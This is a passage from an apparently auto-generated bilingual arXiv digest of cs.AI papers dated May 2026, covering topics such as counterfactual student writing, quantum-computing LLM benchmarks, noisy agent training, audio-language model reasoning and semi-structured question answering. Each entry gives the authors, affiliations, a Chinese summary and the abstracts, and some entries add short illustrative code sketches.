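print(k_medoids(latent, k=2))  # [0, 3]
```

The returned indices are the instances one would send for labeling; the same routine run on raw features instead of latent embeddings corresponds to the original-space baseline the abstract argues against.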

2605.27249 2026-05-27 cs.AI cs.CL 版本更新

Gumbel Machine: Counterfactual Student Writing Generation via Gumbel Noise Steering

Gumbel机器:通过Gumbel噪声引导生成反事实学生写作

Hunter McNichols, Alexander Scarlatos, Mihai Dascalu, Danielle McNamara, Andrew Lan

发表机构 * University of Massachusetts Amherst(马萨诸塞大学阿默斯特分校) University Politehnica of Bucharest(布加勒斯特理工大学) Arizona State University(亚利桑那州立大学)

AI总结 提出Gumbel机器,一种利用β-Hindsight控制解码算法生成既符合评分标准又与学生原文相似的反事实文本的模块化方法。

Comments preprint

详情
AI中文摘要

跨学科教学的有效方法是提供高质量工作的示例。然而,示例可能与学生的当前工作存在显著差异,使得学生难以模仿。理想的学习示范是学生工作的反事实版本,即与学生自身工作相似但有所改进的版本。现有的使用大型语言模型(LLMs)进行反事实文本生成的自动化方法导致了难以转化为实际应用的领域特定系统。我们提出了Gumbel机器,一种灵活、模块化的反事实生成方法,它利用LLM的指令遵循能力,同时鼓励与参考事实文本的相似性。我们方法的核心是一种新颖的受控解码算法β-Hindsight控制,该算法在反事实生成过程中利用潜在随机性作为可调的相似性控制机制。在根据各种标准评分的学生写作数据集上的实验表明,我们的方法在生成既符合评分标准又与参考文本相似的反事实文本方面是有效的。

英文摘要

An effective method of teaching across disciplines is to provide examples of high-quality work. However, an example may be significantly different from a student's current work, making it challenging for them to emulate. An ideal learning demonstration is a counterfactual version of the student work, an improved version that is still similar to their own. Existing automated approaches for counterfactual text generation using Large Language Models (LLMs) result in domain-specific systems that are difficult to translate into practical applications. We present the Gumbel Machine, a flexible, modular approach to generating counterfactuals that leverages LLM instruction-following capabilities while encouraging similarity to a reference factual text. Central to our approach is a novel, controlled decoding algorithm, $β$-Hindsight control, which uses latent randomness as a tunable similarity control mechanism during counterfactual generation. Experiments on datasets of student writing, scored on various criteria, demonstrate the effectiveness of our approach at generating counterfactuals both rubric-consistent and similar to a reference.
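The idea of treating latent randomness as a shared resource can be illustrated with the Gumbel-max trick: taking the argmax of logits plus Gumbel(0, 1) noise draws a sample from the softmax distribution, and reusing the same noise under modified logits gives a counterfactual draw that tends to stay close to the original. The sketch below shows only that shared-noise mechanism. It does not implement $β$-Hindsight control, whose details are not given in the abstract, and the logits are invented.

```python
import math
import random


def gumbel_noise(n, rng):
    """Draw n independent Gumbel(0, 1) samples."""
    # Clamp away from 0 so log() is always defined.
    return [-math.log(-math.log(max(rng.random(), 1e-12))) for _ in range(n)]


def gumbel_argmax(logits, noise):
    """Pick the index maximizing logit + noise (Gumbel-max sampling)."""
    return max(range(len(logits)), key=lambda i: logits[i] + noise[i])


rng = random.Random(0)
noise = gumbel_noise(3, rng)

factual_logits = [2.0, 1.0, 0.5]         # hypothetical original prompt
counterfactual_logits = [1.8, 1.3, 0.5]  # hypothetical rubric-aware prompt

factual_token = gumbel_argmax(factual_logits, noise)
# Same noise, different logits: the choice changes only if the logits shift enough.
counterfactual_token = gumbel_argmax(counterfactual_logits, noise)
```

Drawing fresh noise for the counterfactual instead would decouple the two samples, which is the contrast a tunable similarity control would interpolate between.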

2605.27246 2026-05-27 cs.LO cs.AI math.LO 版本更新

Many Logics, One Methodology: A Plea for Logical Pluralism in Formalised Reasoning (preprint)

多种逻辑,一种方法论:在形式化推理中倡导逻辑多元主义(预印本)

Christoph Benzmüller, Daniel Kirchner, Luca Pasetto

发表机构 * University of Luxembourg(卢森堡大学)

AI总结 本文基于LogiKEy逻辑多元知识表示与推理方法论,主张在统一元逻辑框架内支持对象逻辑层面的逻辑多元主义,并警告逻辑帝国主义对跨学科复用的阻碍。

Comments 21 pages, 6 figures; to appear (preprint)

详情
AI中文摘要

这份立场声明回顾了二十年来在经典高阶逻辑(HOL)中浅嵌入非经典逻辑的工作,该研究扩展为HOL中的一系列逻辑嵌入,并启发了LogiKEy逻辑多元知识表示与推理方法论。本文在LogiKEy等统一元逻辑框架内,以计算形而上学为基础,论证了对象逻辑层面的逻辑多元主义。更广泛地说,它倡导现代证明助手对逻辑多元主义的原则性支持,并警告逻辑帝国主义——即在大规模理论发展中僵化采用单一基础逻辑——这阻碍了LogiKEy旨在实现的跨学科复用。

英文摘要

This position statement looks back on two decades of work on shallow embeddings of non-classical logics in classical higher-order logic (HOL), a line of research that expanded into a range of logic embeddings in HOL and inspired the LogiKEy logic-pluralistic knowledge representation and reasoning methodology. This paper advances the case for logical pluralism at object-logic level within a unifying meta-logical framework such as LogiKEy, grounding the argument in computational metaphysics. More broadly, it advocates principled support for logical pluralism in modern proof assistants, and cautions against logical imperialism -- the rigid adoption of a single foundational logic for large-scale theory developments -- which impedes the interdisciplinary reuse that LogiKEy is designed to enable.

2605.27210 2026-05-27 quant-ph cs.AI 版本更新

Qiskit QuantumKatas: Adapting Microsoft's Quantum Computing exercises for LLM evaluation

Qiskit QuantumKatas: 为LLM评估改编微软的量子计算练习

Juan Cruz-Benito, Ismael Faro

发表机构 * IBM Research(IBM研究院)

AI总结 本文将微软的QuantumKatas量子计算课程从Q#移植到Qiskit,并构建评估框架,用于系统评估大型语言模型在量子计算任务上的能力。

详情
AI中文摘要

我们将微软的QuantumKatas——一个成熟的量子计算课程——从Q#改编到最广泛采用的量子计算框架Qiskit,并打包一个用于系统LLM评估的评估框架。由此产生的基准测试包含26个类别中的350个任务,涵盖从基本门到高级算法(Grover、Simon、Deutsch-Jozsa)、纠错、密钥分发和量子游戏。每个任务包括自然语言提示、规范解和通过经典电路模拟的确定性测试验证。通过基于QuantumKatas经过验证的教学设计而不是从头创建任务,我们继承了有原则的难度递进和全面的概念覆盖,同时贡献了框架改编、评估基础设施和实证分析。我们评估了7种提示配置下的16个LLM——总共39,200次模型运行——以证明基准测试的实用性。三个关键发现出现:(1)基准测试有效区分模型能力,最佳配置通过率从32.3%到83.1%不等,前沿模型与开源模型之间平均差距为26.1个百分点;(2)模型在实现已知算法方面表现良好(SimonsAlgorithm 82.1%,BasicGates 81.6%),但在问题编码方面表现不佳(SolveSATWithGrover 34.4%,DistinguishUnitaries 40.0%);(3)思维链提示显示出适度双峰效应——它是三个模型的最佳策略(其中两个根据供应商文档明确进行了推理调优),但降低了其余模型的性能,使其总体上处于中游(平均56.3%),落后于少样本-5(57.8%)。我们发布基准测试、评估框架和基线结果,以支持量子计算中LLM能力的研究。

英文摘要

We adapt Microsoft's QuantumKatas -- a well-established quantum computing curriculum -- from Q# to Qiskit, the most widely-adopted quantum computing framework, and package it with an evaluation framework for systematic LLM assessment. The resulting benchmark comprises 350 tasks across 26 categories, spanning fundamental gates through advanced algorithms (Grover's, Simon's, Deutsch-Jozsa), error correction, key distribution, and quantum games. Each task includes a natural language prompt, canonical solution, and deterministic test verification via classical circuit simulation. By building on the QuantumKatas' proven pedagogical design rather than creating tasks from scratch, we inherit a principled difficulty progression and comprehensive concept coverage while contributing the framework adaptation, evaluation infrastructure, and empirical analysis. We evaluate 16 LLMs across 7 prompting configurations -- a total of 39,200 model runs -- to demonstrate the benchmark's utility. Three key findings emerge: (1) the benchmark effectively differentiates model capabilities, with best-configuration pass rates ranging from 32.3% to 83.1% and a 26.1 pp average gap between frontier and open-source models; (2) models perform well at implementing known algorithms (SimonsAlgorithm 82.1%, BasicGates 81.6%) but struggle with problem encoding (SolveSATWithGrover 34.4%, DistinguishUnitaries 40.0%); and (3) chain-of-thought prompting shows a modestly bimodal effect -- it is the best strategy for three models (two of them explicitly reasoning-tuned per vendor documentation) but degrades performance for the rest, leaving it mid-pack in aggregate (56.3% mean) behind few-shot-5 (57.8%). We release the benchmark, evaluation framework, and baseline results to support research on LLM capabilities in quantum computing.
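The total of 39,200 runs is consistent with a full evaluation grid, assuming each model attempts every task once under every prompting configuration (the abstract does not state whether runs are repeated):

```python
models = 16    # LLMs evaluated
configs = 7    # prompting configurations
tasks = 350    # benchmark tasks

# One run per (model, configuration, task) triple.
total_runs = models * configs * tasks
print(total_runs)  # 39200
```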

2605.27209 2026-05-27 cs.AI 版本更新

Learning to Act under Noise: Enhancing Agent Robustness via Noisy Environments

在噪声中学习行动:通过噪声环境增强智能体鲁棒性

Yuxin Chen, Xiaodong Cai, Junfeng Fang, Zhuowen Han, Yu Wang, Yaorui Shi, Yi Zhang, Qi Gu, Xunliang Cai, Xiang Wang, An Zhang, Tat-Seng Chua

发表机构 * National University of Singapore(新加坡国立大学) Meituan(美团) Tsinghua University(清华大学) Tianjin University(天津大学) University of Science and Technology of China(中国科学技术大学)

AI总结 提出NoisyAgent框架,通过在训练中引入用户噪声和工具噪声,提升智能体在真实世界噪声环境下的鲁棒性和泛化能力。

详情
AI中文摘要

大型语言模型(LLMs)的最新进展促进了LLMs作为能够推理、规划和工具使用的交互式智能体的广泛部署。尽管在现有基准测试中表现强劲,但此类智能体在部署到现实世界环境时往往表现出显著退化,因为现实环境本质上是随机且不完美的。我们认为,这种差异源于理想化训练设置与现实交互动态之间的根本性不匹配,当前范式依赖于精心策划的任务指令和稳定、可控的环境。为了解决这一差距,我们提出了NoisyAgent,一个明确将环境不完美性纳入智能体学习过程的智能体训练框架。我们识别出现实场景中交互噪声的两个主要来源:用户噪声,捕捉用户交互中的模糊性和变异性;以及工具噪声,反映工具执行中的失败和异常。我们通过修改用户交互模式和模拟训练环境中的工具执行结果,将此类扰动引入训练流程。为了稳定训练同时鼓励智能体处理日益具有挑战性的不完美性,噪声仅应用于部分轨迹,并随着模型适应当前噪声水平而逐步增加难度。大量实验表明,我们的方法在噪声和动态环境下持续提升智能体鲁棒性。我们的分析揭示,在噪声条件下训练也在理想化基准测试中带来了性能提升,这表明对环境噪声的受控暴露促进了更可泛化的推理和决策行为。我们的发现强调了建模交互不完美性对于弥合智能体训练与现实部署之间差距的重要性。

英文摘要

Recent advances in large language models (LLMs) have facilitated the widespread deployment of LLMs as interactive agents capable of reasoning, planning, and tool use. Despite strong performance on existing benchmarks, such agents often exhibit notable degradation when deployed in real-world settings, where environments are inherently stochastic and imperfect. We argue that this discrepancy arises from a fundamental mismatch between idealized training settings and real-world interaction dynamics, where current paradigms rely on carefully curated task instructions and stable, well-controlled environments. To address this gap, we propose NoisyAgent, an agentic training framework that explicitly incorporates environmental imperfections into the agent learning process. We identify two major sources of interaction noise in real-world scenarios: user noise, which captures ambiguity and variability in user interaction, and tool noise, which reflects failures and anomalies in tool execution. We introduce such perturbations into the training pipeline by modifying user interaction patterns and simulating tool execution results within the training environment. To stabilize training while encouraging agents to handle increasingly challenging imperfections, noise is applied to only a subset of rollouts and progressively increased in difficulty as the model adapts to the current noise level. Extensive experiments demonstrate that our approach consistently improves agent robustness under noisy and dynamic environments. Our analysis reveals that training under noise conditions also yields performance gains on idealized benchmarks, suggesting that controlled exposure to environmental noise promotes more generalizable reasoning and decision-making behaviors. Our findings highlight the importance of modeling interaction imperfections for bridging the gap between agent training and real-world deployment.
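The schedule described above (noise on only a subset of rollouts, with difficulty raised as the model adapts) might look like the following sketch. Everything here is hypothetical: the function names, the integer noise levels, the 0.7 promotion threshold, and the cap of 3 are illustrative choices, not values from the paper.

```python
import random


def plan_rollouts(n, noise_fraction, level, rng):
    """Return a noise level per rollout: `level` for a random subset, 0 (clean) otherwise."""
    noisy = set(rng.sample(range(n), int(n * noise_fraction)))
    return [level if i in noisy else 0 for i in range(n)]


def next_level(level, success_rate, promote_at=0.7, max_level=3):
    """Raise the noise level once the agent copes with the current one."""
    if success_rate >= promote_at:
        return min(level + 1, max_level)
    return level


rng = random.Random(0)
plan = plan_rollouts(n=8, noise_fraction=0.25, level=2, rng=rng)
# Two of the eight rollouts are perturbed; the rest stay clean to stabilize training.
level = next_level(level=2, success_rate=0.8)  # promoted to 3
```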

2605.27205 2026-05-27 eess.IV cs.AI 版本更新

TWIST: Closed-Loop token Synchronization for Application-Aware Wireless Digital Twins

TWIST:面向应用感知无线数字孪生的闭环令牌同步

Sige Liu, Kezhi Wang

发表机构 * Department of Computer Science, Brunel University London(伦敦布鲁内尔大学计算机科学系)

AI总结 提出TWIST框架,通过闭环令牌同步和模式条件不等错误保护,在有限通信资源下实现应用感知的无线数字孪生状态同步,提升交通状态推断性能并降低同步成本。

详情
AI中文摘要

无线数字孪生需要在有限且时变的通信资源下,对随时间演变的物理场景及其数字副本进行重复同步。对于以感知为中心的数字孪生,像素域传输或均匀保护的比特流可能与孪生侧应用消耗的语义状态不匹配。本文提出TWIST,一种面向应用感知无线数字孪生的闭环令牌同步框架。TWIST将每个物理观测表示为一个令牌,并通过无线链路同步该状态,而非优化视觉重建。令牌位置按任务相关性分组,并通过低、中、高同步模式下的模式条件不等错误保护进行保护。在孪生侧,解码置信度将不可靠的硬令牌决策转换为擦除,在更新语义孪生状态之前由补全模型恢复。恢复后的状态支持交通状态推断,并生成紧凑的反馈统计信息,包括信道质量、接收器不确定性、语义漂移和应用优先级,用于后续模式自适应。在动态道路场景数字孪生场景上的实验表明,与固定模式和仅信道自适应策略相比,TWIST改善了交通状态推断和语义孪生状态同步,同时相对于始终高传输降低了平均同步成本。

英文摘要

Wireless digital twins require repeated synchronization between a time-evolving physical scene and its digital counterpart under limited and time-varying communication resources. For perception-centric twins, pixel-domain transmission or uniformly protected bitstreams can be mismatched to the semantic state consumed by twin-side applications. This paper proposes TWIST, a closed-loop token synchronization framework for application-aware wireless digital twins. TWIST represents each physical observation as a token and synchronizes this state over a wireless link, rather than optimizing visual reconstruction. Token positions are grouped by task relevance and protected through mode-conditioned unequal error protection under low-, medium-, and high-synchronization modes. At the twin side, decoding confidence converts unreliable hard token decisions into erasures, which are restored by a completion model before updating the semantic twin state. The recovered state supports traffic-state inference and generates compact feedback statistics, including channel quality, receiver uncertainty, semantic drift, and application priority, for subsequent mode adaptation. Experiments on a dynamic road-scene digital-twin scenario show that TWIST improves traffic-state inference and semantic twin-state synchronization compared with fixed-mode and channel-only adaptation strategies, while reducing the average synchronization cost relative to always-high transmission.
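The twin-side step of turning low-confidence token decisions into erasures and then restoring them can be sketched as below. The threshold value and the token IDs are invented, and the `complete` function is a deliberately trivial stand-in (it reuses the previous twin state) for the learned completion model the abstract mentions.

```python
ERASED = None  # marker for a token position whose hard decision was discarded


def to_erasures(tokens, confidences, threshold):
    """Keep a decoded token only if its confidence meets the threshold."""
    return [tok if conf >= threshold else ERASED
            for tok, conf in zip(tokens, confidences)]


def complete(tokens, previous_state):
    """Stand-in completion: fill each erasure from the previous twin state."""
    return [prev if tok is ERASED else tok
            for tok, prev in zip(tokens, previous_state)]


decoded = [5, 9, 2]             # hypothetical hard token decisions
confidence = [0.9, 0.3, 0.8]    # hypothetical decoder confidences
previous_state = [4, 7, 2]      # hypothetical last synchronized state

masked = to_erasures(decoded, confidence, threshold=0.5)
print(masked)                             # [5, None, 2]
print(complete(masked, previous_state))   # [5, 7, 2]
```

Marking position 1 as erased rather than trusting the unreliable value 9 is what lets a completion model, instead of channel noise, decide what the twin state should contain.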

2605.27203 2026-05-27 cs.CV cs.AI 版本更新

Generative Animations: A Multi-Model Pipeline for Prompt-Driven Motion Synthesis

生成式动画:面向提示驱动运动合成的多模型流水线

Mannat Khurana, Sanyam Jain, Rishav Agarwal

发表机构 * Canva Adobe

AI总结 提出一种结合大语言模型和分割模型的流水线,将自然语言提示自动转换为符合场景几何、深度遮挡和3D透视变换的动画运动路径。

Comments 5 pages, 6 figures

详情
AI中文摘要

动画将数字文档提升为沉浸式体验,然而创建自定义运动路径仍然繁琐,需要设计师手动选择预设、绘制贝塞尔点并配置时间属性。我们引入了生成式动画,这是一个将自然语言提示转换为生产就绪动画的系统。通过将用于语义解析的大语言模型(LLMs)与用于视觉基础的Segment Anything Model(SAM)串联,我们的流水线自动生成尊重场景几何、处理基于深度的遮挡并考虑3D透视变换的运动路径。我们通过三个用例演示该系统:轮廓跟随轨迹、具有z轴顺序意识的轨道动画以及变换对象上的透视对齐运动。

英文摘要

Animation elevates digital documents into immersive experiences, yet creating custom motion paths remains cumbersome, requiring designers to manually select presets, plot Bézier points, and configure timing properties. We introduce Generative Animations, a system that transforms natural language prompts into production-ready animations. By chaining Large Language Models (LLMs) for semantic parsing with the Segment Anything Model (SAM) for visual grounding, our pipeline automatically generates motion paths that respect scene geometry, handle depth-based occlusions, and honor 3D perspective transforms. We demonstrate the system through three use cases: contour-following trajectories, orbital animations with z-order awareness, and perspective-aligned motion on transformed objects.

2605.27190 2026-05-27 cs.CL cs.AI cs.LG cs.SD 版本更新

Learning When to Think While Listening in Large Audio-Language Models

在大音频语言模型中学习何时在聆听时思考

Zhiyuan Song, Weici Zhao, Yang Xiao, Suhao Yu, Cheng Zhu, Jiatao Gu

发表机构 * University of Pennsylvania(宾夕法尼亚大学)

AI总结 提出一种可学习的等待-思考-回答控制机制,通过多奖励强化学习优化大音频语言模型在流式语音交互中的推理时机,在提升准确率的同时减少响应延迟。

Comments 19 pages, 4 figures, 6 tables

详情
AI中文摘要

近期大音频语言模型(LALMs)的进展使得实时、流式的语音交互越来越实用。在这种场景下,推理质量和响应速度紧密耦合:将推理延迟到语音端点可以提高答案质量,但会将思考时间转移到用户可见的响应延迟中,而过早回答则可能在决定性证据到达之前做出承诺。我们为LALMs引入了一种可学习的等待-思考-回答控制公式。受人类对话渐进性启发,控制器在部分音频证据下决定何时等待、何时外化紧凑的推理更新、以及何时回答。以Qwen2.5-Omni-7B为基础模型,我们从语音推理数据中构建对齐的等待-思考-回答轨迹,使用监督微调(SFT)训练控制器,然后应用解耦裁剪和动态采样策略优化(DAPO)。奖励结合了答案正确性、动作有效性、更新时机、延迟同步、推理质量和链一致性,优化完整的等待-思考-回答轨迹,而不仅仅是最终答案。在一个六任务合成语音推理问答(SRQA)基准上,六奖励DAPO控制器将行加权准确率从67.6%提升到70.3%,同时在相同Qwen部署环境下将端点后最终思考长度减少14%。在一个包含186个人类录音的真实音频基准(Real Audio Bench)上,作为超越文本转语音(TTS)渲染语音的迁移检查,控制器家族仍然有效:SFT实现了最强的准确率,而六奖励DAPO控制器是唯一最终思考长度低于基础模型的学习变体。这些结果表明,流式模型应该学习在音频流中何时使中间推理显式化。

英文摘要

Recent advances in Large Audio-Language Models (LALMs) have made real-time, streaming spoken interaction increasingly practical. In this setting, reasoning quality and responsiveness are tightly coupled: delaying reasoning until the speech endpoint can improve answer quality but moves deliberation into user-visible response delay, while answering too early risks committing before decisive evidence arrives. We introduce a learnable wait-think-answer control formulation for LALMs. Motivated by the incremental nature of human conversation, the controller decides under partial audio evidence when to wait, when to externalize a compact reasoning update, and when to answer. Using Qwen2.5-Omni-7B as the base model, we construct aligned wait-think-answer traces from spoken reasoning data, train the controller with supervised fine-tuning (SFT), and then apply Decoupled Clip and Dynamic Sampling Policy Optimization (DAPO). The reward combines answer correctness, action validity, update timing, latency synchronization, reasoning quality, and chain consistency, optimizing the complete wait-think-answer trajectory and not the final answer alone. On a six-task synthetic spoken reasoning question answering (SRQA) benchmark, the six-reward DAPO controller improves the row-weighted accuracy from 67.6% to 70.3% while reducing post-endpoint final-think length by 14% under the same Qwen deployment harness. On a 186-item human-recorded Real Audio Bench, a transfer check beyond text-to-speech (TTS)-rendered speech, the controller family remains functional: SFT achieves the strongest accuracy, while the six-reward DAPO controller is the only learned variant whose final-think length falls below the base. These results suggest that a streaming model should learn when to make intermediate reasoning explicit during the audio stream.

2605.27178 2026-05-27 cs.CV cs.AI cs.LG cs.RO 版本更新

FoundObj: Self-supervised Foundation Models as Rewards for Label-free 3D Object Segmentation

FoundObj: 自监督基础模型作为无标签3D物体分割的奖励

Zihui Zhang, Zhixuan Sun, Yafei Yang, Jinxi Li, Jiahao Chen, Bo Yang

发表机构 * Shenzhen Research Institute, The Hong Kong Polytechnic University(深圳研究院,香港理工大学) vLAR Group, The Hong Kong Polytechnic University(vLAR小组,香港理工大学)

AI总结 提出FoundObj框架,利用自监督2D/3D基础模型的语义和几何先验作为奖励,通过强化学习引导超点合并,实现无标注复杂场景3D物体分割。

Comments ICML 2026. Zihui and Zhixuan are co-first authors. Code and data are available at: https://github.com/vLAR-group/FoundObj

详情
AI中文摘要

我们解决了在训练过程中不依赖任何场景级人类标注的复杂场景点云中3D物体分割的挑战性任务。现有方法通常局限于识别简单物体,这主要是由于学习过程中物体先验不足。在本文中,我们提出了FoundObj,一个新颖的框架,其特点是基于超点的物体发现代理,该代理在我们的创新语义和几何奖励模块的指导下逐步合并合适的相邻超点。这些模块协同利用自监督2D/3D基础模型中的语义和几何先验,为物体发现代理提供互补反馈,并通过强化学习实现对多类物体的鲁棒识别。在多个基准上的大量实验表明,我们的方法始终优于现有基线。值得注意的是,我们的方法在零样本和长尾场景中表现出强大的泛化能力,突显了其在可扩展、无标签3D物体分割方面的潜力。

英文摘要

We address the challenging task of 3D object segmentation in complex scene point clouds without relying on any scene-level human annotations during training. Existing methods are typically constrained to identifying simple objects, primarily due to insufficient object priors in the learning process. In this paper, we present FoundObj, a novel framework featuring a superpoint-based object discovery agent that incrementally merges suitable neighboring superpoints, guided by our innovative semantic and geometric reward modules. These modules synergistically leverage semantic and geometric priors from self-supervised 2D/3D foundation models, providing complementary feedback to the object discovery agent and enabling robust identification of multi-class objects through reinforcement learning. Extensive experiments on diverse benchmarks demonstrate that our approach consistently outperforms existing baselines. Notably, our method exhibits strong generalization in zero-shot and long-tail scenarios, underscoring its potential for scalable, label-free 3D object segmentation.

2605.27174 2026-05-27 cs.SD cs.AI cs.CY 版本更新

An investigation of AI integration in sound designer workflows and experiences

AI在声音设计师工作流程与体验中的整合研究

Nelly Garcia, Joshua Reiss

发表机构 * Queen Mary University of London(伦敦大学玛丽女王学院)

AI总结 通过混合方法研究(76人调查+20人访谈),发现当前AI工具在快速消费媒体中表现良好,但缺乏高端声音设计所需的叙事复杂性,从业者偏好辅助性、任务特定的应用,而非端到端生成系统。

详情
AI中文摘要

人工智能正越来越多地被整合到专业音频制作工作流程中,然而开发者生产的工具与实际声音设计师的需求之间仍存在差距。本文通过一项混合方法研究调查了这一差距,包括对76名从业者的调查以及对20名行业专业人士的后续半结构化访谈。使用描述性统计分析和主题分析对结果进行分析,以识别两个数据集中的模式。我们的分析得出了五个主题:上下文、工作流程、潜力、风险和正确使用。我们的工作表明,当前的AI工具在快速消费媒体环境中表现良好,但缺乏高端声音设计(电影、沉浸式体验等)所需的叙事复杂性。从业者表现出对辅助性、任务特定应用的偏好,特别是在音频修复和库管理方面,而不是端到端生成系统。这项工作为创意产业中AI及AI增强工具的使用正在进行的讨论做出了贡献。我们从声音设计师和创意音频从业者的角度报告了该领域的当前状况,并根据我们的发现为声音技术专家和开发者提供了一系列建议,以指导开发更明智的AI声音设计工具。

英文摘要

Artificial intelligence is increasingly being integrated into professional audio production workflows, yet a gap persists between the tools developers produce and the requirements of practising sound designers. This paper investigates this gap through a mixed-methods study comprising a survey of 76 practitioners and follow-up semi-structured interviews with 20 industry professionals. Results were analysed using descriptive statistical analysis and thematic analysis to identify patterns across both datasets. Five themes emerged from our analysis: Context, Workflow, Potential, Risks, and Right Use. Our work indicates that current AI tools perform adequately in fast-consumption media contexts but lack the narrative sophistication required for high-end sound design (films, immersive experiences, etc.). Practitioners demonstrate a preference for assistive, task-specific applications, particularly in audio restoration and library management, over end-to-end generative systems. This work contributes to the ongoing discussion on the use of AI and AI-enhanced tools in the creative industries. We report on the current status of the field from the point of view of sound designers and creative audio practitioners, and offer a set of recommendations for sound technologists and developers based on our findings to guide the development of more informed AI tools for sound design.

2605.27168 2026-05-27 cs.CL cs.AI cs.CY 版本更新

Grounding Text Embeddings in Stakeholder Associations

将文本嵌入与利益相关者关联对齐

Jonathan Rystrøm, Sofie Burgos-Thorsen, Zihao Fu, Johan Irving Søltoft, Kenneth C. Enevoldsen, Chris Russell

发表机构 * University of Oxford(牛津大学) Institute for Wicked Problems(复杂问题研究所) The Chinese University of Hong Kong(香港中文大学) Danish Technical University(丹麦技术大学) Aarhus University(奥胡斯大学)

AI总结 提出利益相关者对齐练习方法,通过评估嵌入模型与人类专家的语义距离一致性,发现神经文本嵌入在丹麦政策案例中可靠性显著低于专家(差距19-26个百分点),且该差距在美国联邦AI用例中复现(16个百分点)。

详情
AI中文摘要

文本嵌入被广泛用于分析大型复杂文本语料库。然而,尚不清楚这些嵌入是否捕捉到与使用它们的人类专家相同的语义距离。确保嵌入表示与人类意图一致对于有效分析至关重要。我们提出了利益相关者对齐练习,这是一种使专家关联显式化并将嵌入模型结果扎根于人类理解的方法。在我们关于丹麦政策问题的主要案例研究中,我们发现神经文本嵌入的可靠性远低于人类专家(差距19-26个百分点),并且这种不对齐会传播到下游聚类性能(练习排名与聚类质量之间的Spearman $ρ=0.9$)。一项关于美国联邦AI用例的二次研究使用数字协议和不同的专家社区在英语中复现了该差距(16个百分点)——表明该差距并非单一工具或领域的产物。利益相关者对齐练习提供了一种实用方法,用于评估嵌入模型是否捕捉到对领域专家最重要的语义区分。

英文摘要

Text embeddings are widely used to analyse large corpora of complex texts. However, it is unclear whether the embeddings capture the same semantic distances as the human experts using them. Ensuring alignment between embedding representations and human intentions is essential for valid analyses. We present the Stakeholder Grounding Exercise, a method for making expert associations explicit and grounding embedding model results in human understanding. In our primary case study on Danish policy issues, we find that neural text embeddings are substantially less reliable than human experts (19-26 pp gap), and that this misalignment propagates to downstream clustering performance (Spearman $ρ=0.9$ between exercise ranking and cluster quality). A secondary study on US Federal AI use cases replicates the gap (16 pp) in English, using a digital protocol and a different community of experts -- demonstrating that the gap is not an artefact of a single instrument or domain. The Stakeholder Grounding Exercise offers a practical method for assessing whether embedding models capture the semantic distinctions that matter most to domain experts.
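For readers unfamiliar with the statistic, Spearman's rank correlation between two tie-free rankings of $n$ items is $ρ = 1 - 6\sum d_i^2 / (n(n^2-1))$, where $d_i$ is the rank difference for item $i$. The sketch below computes it for two made-up rankings of five embedding models; the ranks are invented for illustration and are not the paper's data.

```python
def spearman_rho(ranks_a, ranks_b):
    """Spearman rank correlation for two rankings without ties."""
    n = len(ranks_a)
    d_squared = sum((a - b) ** 2 for a, b in zip(ranks_a, ranks_b))
    return 1 - 6 * d_squared / (n * (n ** 2 - 1))


# Invented ranks: five models ordered by exercise score and by cluster quality.
exercise_rank = [1, 2, 3, 4, 5]
cluster_rank = [1, 2, 3, 5, 4]  # only the last two models swap places

print(round(spearman_rho(exercise_rank, cluster_rank), 3))  # 0.9
```

With five items, a single swap of adjacent positions already lowers the coefficient from 1.0 to 0.9, which gives a sense of how close two rankings must be to reach that value.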

2605.27164 2026-05-27 cs.AI 版本更新

Query Symbolically or Retrieve Semantically? A Dataset and Method for Semi-Structured Question Answering

符号查询还是语义检索?面向半结构化问答的数据集与方法

Mateusz Czyżnikiewicz, Ryszard Tuora, Adam Kozakiewicz, Tomasz Ziętkiewicz, Mateusz Galiński, Michał Godziszewski, Michał Karpowicz, Timothy Hospedales, Cristina Cornelio

发表机构 * Samsung AI Warsaw(三星AI华沙实验室) Samsung AI Cambridge(三星AI剑桥实验室)

AI总结 提出 DualGraph 框架,通过文本知识图谱和符号知识图谱双视图实现半结构化文档的语义检索与符号查询结合,并在 SpecsQA 基准上超越现有方法。

详情
AI中文摘要

检索增强生成(RAG)系统通常通过查询与文档块之间的语义相似性来检索证据。虽然这种方法对非结构化文本有效,但在半结构化语料库上可靠性较低,因为回答可能需要跨多个文档的结构化属性进行精确过滤、聚合或穷举检索。符号方法支持此类操作,但在嘈杂的自然语言语料库上往往脆弱。我们通过 DualGraph 解决了这一差距,这是一个 RAG 框架,通过两种互补视图表示文档:用于语义检索的文本知识图谱和用于对类型化主语-谓语-宾语三元组进行符号查询的符号知识图谱。基于这两个组件,我们提供了多种策略来选择或组合语义和符号证据。我们还引入了 SpecsQA,这是一个来自商业购物网站的基准测试,包含半结构化产品文档和人工策划的问题,涵盖开放式和面向规格的检索。实验表明,DualGraph 在各种问题类型上始终优于最先进的密集检索、GraphRAG、符号和基于表格的基线。代码和数据可在 https://github.com/corneliocristina/DualGraphRAG 获取。

英文摘要

Retrieval-Augmented Generation (RAG) systems for question answering typically retrieve evidence by semantic similarity between the query and document chunks. While effective for unstructured text, this approach is less reliable on semi-structured corpora where answering may require exact filtering, aggregation, or exhaustive retrieval over structured attributes across multiple documents. Symbolic approaches support such operations, but they are often brittle on noisy natural-language corpora. We address this gap with DualGraph, a RAG framework that represents documents through two complementary views: a Textual Knowledge Graph for semantic retrieval and a Symbolic Knowledge Graph for symbolic querying over typed subject--predicate--object triples. Building on these two components, we provide multiple strategies for selecting or combining semantic and symbolic evidence. We also introduce SpecsQA, a benchmark from a commercial shopping website with semi-structured product documents and manually curated questions spanning open-ended and specification-oriented retrieval. Experiments show that DualGraph consistently outperforms state-of-the-art dense-retrieval, GraphRAG, symbolic, and table-oriented baselines across question types. Code and data are available at https://github.com/corneliocristina/DualGraphRAG.
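The kind of exact, exhaustive filtering that similarity search handles poorly is straightforward over typed triples. The sketch below answers "which Acme phones have a battery of at least 5000 mAh?" against a tiny in-memory triple list. The product names, predicates, and the helper `subjects_where` are hypothetical and do not reflect the DualGraph code or the SpecsQA schema.

```python
# Typed subject-predicate-object triples (invented product data).
triples = [
    ("phone_a", "battery_mah", 5000),
    ("phone_a", "brand", "Acme"),
    ("phone_b", "battery_mah", 4000),
    ("phone_b", "brand", "Acme"),
    ("phone_c", "battery_mah", 5200),
    ("phone_c", "brand", "Globex"),
]


def subjects_where(triples, predicate, test):
    """Return every subject whose object for `predicate` passes `test`."""
    return {s for s, p, o in triples if p == predicate and test(o)}


big_battery = subjects_where(triples, "battery_mah", lambda v: v >= 5000)
acme = subjects_where(triples, "brand", lambda v: v == "Acme")

# Conjunction of both constraints, evaluated exactly over all products.
result = sorted(big_battery & acme)
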